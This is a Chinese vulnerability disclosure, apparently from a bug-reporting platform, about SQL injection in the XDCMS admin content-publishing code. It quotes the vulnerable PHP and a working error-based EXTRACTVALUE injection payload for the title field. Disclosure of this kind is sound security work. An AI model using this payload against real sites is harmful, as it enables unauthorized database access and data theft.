2014-02-18: 细节已通知厂商并且等待厂商处理中 2014-02-24: 厂商已经确认,细节仅向厂商公开 2014-02-27: 细节向第三方安全合作伙伴开放 2014-04-20: 细节向核心白帽子及相关领域专家公开 2014-04-30: 细节向普通白帽子公开 2014-05-10: 细节向实习白帽子公开 2014-05-19: 细节向公众公开
SQL Injection
注入在XDCMS企业管理系统后台的内容发布处,\system\modules\xdcms\content.php文件:
public function add_save(){ $title=safe_html($_POST['title']);//第一处注入title字段,safe_html为过滤规则集,可被大写绕过进行注入 $commend=intval($_POST['commend']); $username=safe_html($_POST['username']);//第二处注入username,大写可绕过过滤 $thumb=$_POST['thumb']; $keywords=safe_html($_POST['keywords']);//第三处注入,同上 $description=safe_html($_POST['description']);//第四处注入,同上 $inputtime=datetime(); $updatetime=strtotime($_POST['updatetime']); $url=$_POST['url'];//第五处注入,没有safe_html过滤。 $catid=intval($_POST['catid']); $userid=intval($_SESSION['admin_id']); $fields=$_POST['fields']; $style=$_POST['title_color']." ".$_POST['title_weight']; if(empty($title)||empty($catid)||empty($userid)||empty($updatetime)){ showmsg(C('material_not_complete'),'-1'); } $model=modelname($catid); $model_content=get_content_table($model); if(empty($model)){ showmsg(C('error'),'-1'); } $table=$this->mysql->show_table(); //判断数据表是否存在 if(!in_array(DB_PRE.$model,$table)){ showmsg(C('table_not_exist'),'-1'); } //添加content,sql语句,会将上边5个注入字段带入查询 $sql="insert into ".DB_PRE.$model."(title,commend,username,thumb,keywords,description,inputtime,updatetime,url,catid,userid,hits,style) values('{$title}','{$commend}','{$username}','{$thumb}','{$keywords}','{$description}','{$inputtime}','{$updatetime}','{$url}','{$catid}','{$userid}',0,'{$style}')"; $this->mysql->query($sql); $last_id=$this->mysql->insert_id(); //更新排序值 $this->mysql->db_update($model,"`sort`='".$last_id."'","`id`=".$last_id); //添加附加表 $sql_fields='`id`'; $sql_value=$last_id; if(!empty($_POST['uploadtype'])){ //判断是否有多图上传 $upload_array=$this->upload_more('morefile'); $uploadtype=$_POST['uploadtype']; $fields[$uploadtype]=serialize(array_clear($upload_array)); } foreach($fields as $key=>$value){ $sql_fields.=",`".$key."`"; if(is_array($value)){ $value_arr=''; foreach($value as $k=>$v){ $value_arr.=$v.','; } $value=$value_arr; } $sql_value.=",'".addslashes($value)."'"; } $query=$this->mysql->query("insert into ".DB_PRE.$model_content."({$sql_fields}) values ({$sql_value})"); if(!$query){ $this->mysql->db_delete($model,"`id`=".$last_id); showmsg(C('insert_table_error'),'-1'); } //生成静态 $config=base::load_cache("cache_set_config","_config"); $config_html=$config['createhtml']; //取出系统配置缓存 $array=get_category($catid); $ishtml=$array['is_html']; //取出栏目是否设置生成html if(substr($url,0,7)!="http://"){ //判断url是否为外链,如不是则更新url并生成内容html if($model=='single'){ $url=$array['url']; //如果是单页模型,url直接调用栏目url }else{ $url=$this->ob_url->conurl($catid,$last_id,$ishtml,$inputtime); } $this->mysql->db_update($model,"`url`='".$url."'","`id`=".$last_id); //生成url并更新 if($config_html==1&&$ishtml==1){ if($model=='single'){ $url=$url."index.html"; } $this->html->creat_show($catid,$last_id,$url,$array['lang']); //生成内容html } } if($config_html==1&&$ishtml==1){ $parent=is_parent($catid); $parent_id=explode(",",ltrim($parent,",")); if(count(array_filter($parent_id))!=0){ //判断是否有父类 foreach($parent_id as $value){ $parent_cat=get_category($value); //取出父类栏目的url $this->html->creat_list($value,"",$parent_cat['url']."index.html",$parent_cat['lang']); //生成父栏目页 $this->html->creat_list($catid,"",$array['url']."index.html",$array['lang']); //生成当前栏目页 } }else{ $this->html->creat_list($catid,"",$array['url']."index.html",$array['lang']); //如没有父类,生成列表页,减轻负担,默认只生成当前栏目第一页 } } if($config_html==1){ //如果系统设置生成html则生成首页 $lang=get_lang($array['lang']); $this->html->creat_index($array['lang'],$lang['dir']); } showmsg(C('add_success'),'-1'); }
以第一处title字段为例首先发布一个内容:
上面的title字段插入exp
' AND EXTRACTVALUE(7028,CONCAT(0x5c,0x7177786771,(SELECT (CASE WHEN (7028=7028) THEN 1 ELSE 0 END)),0x71706b6b71)) AND 'PAKz'='PAKz
最后看看结果
过滤严格
危害等级:中
漏洞Rank:10
确认时间:2014-02-24 22:25
老版本没有更新
暂无
